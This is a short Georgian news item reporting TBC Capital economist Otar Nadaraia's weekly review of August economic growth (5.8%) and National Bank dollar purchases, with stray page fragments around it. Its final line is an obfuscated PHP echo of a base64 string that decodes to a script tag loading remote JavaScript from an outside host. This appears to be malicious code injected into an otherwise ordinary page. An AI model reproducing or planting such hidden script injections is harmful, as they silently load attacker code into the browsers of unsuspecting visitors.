celsiusi
ავერსი შნაიდერი

 "თიბისი კაპიტალი" მთავარი ეკონომისტის, ოთარ ნადარაიას ყოველკვირეულ ეკონომიკურ მიმოხილვას აქვეყნებს, რომელიც გასული კვირის განმავლობაში მომხდარ მნიშვნელოვან მოვლენებს შეეხება. ოთარ ნადარაიას შეფასებით, აგვისტოს ეკონომიკური ზრდის პარამეტრი, რაც 5.8%-ს შეადგენდა, ეკონომიკური ზრდის ნორმალიზაციაზე მიანიშნებს. 

"აგვისტოში ეკონომიკური აქტივობა რეალურ გამოხატულებაში 5.8%-ით გაიზარდა, ნაცვლად ჩვენ მიერ პროგნოზირებული 6.1%-სა. სექტემბრის უნაღდო ანგარიშსწორების ბრუნვები, მცირედით, მაგრამ შედარებით მაინც უფრო მაღალ ზრდაზე მიუთითებს, თუმცა მთლიანობაში, ნორმალიზების დინამიკა სახეზეა. იგივე შეიძლება ითქვას სავალუტო შემოდინებებზე, ისევ და ისევ, მხოლოდ ნორმალიზების და არა შემცირების კუთხით.

გასულ კვირაში გამოქვეყნებული მონაცემების თანახმად, აგვისტოში სებ-მა 110 მილიონი აშშ დოლარი შეისყიდა, რაც მართალია წინა თვეებთან შედარებით უფრო დაბალი, მაგრამ მაინც საკმაოდ სოლიდური ოდენობაა. ვინარჩუნებთ შეფასებას, რომ სავალუტო შემოდინებების მხრივ ნეგატიური დინამიკისათვის, საკმაოდ ძლიერი შოკია საჭირო, რაც არსებულ მაკროეკონომიკურ პარამეტრებში არ იკვეთება,"- ნათქვამია მიმოხილვაში

675
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");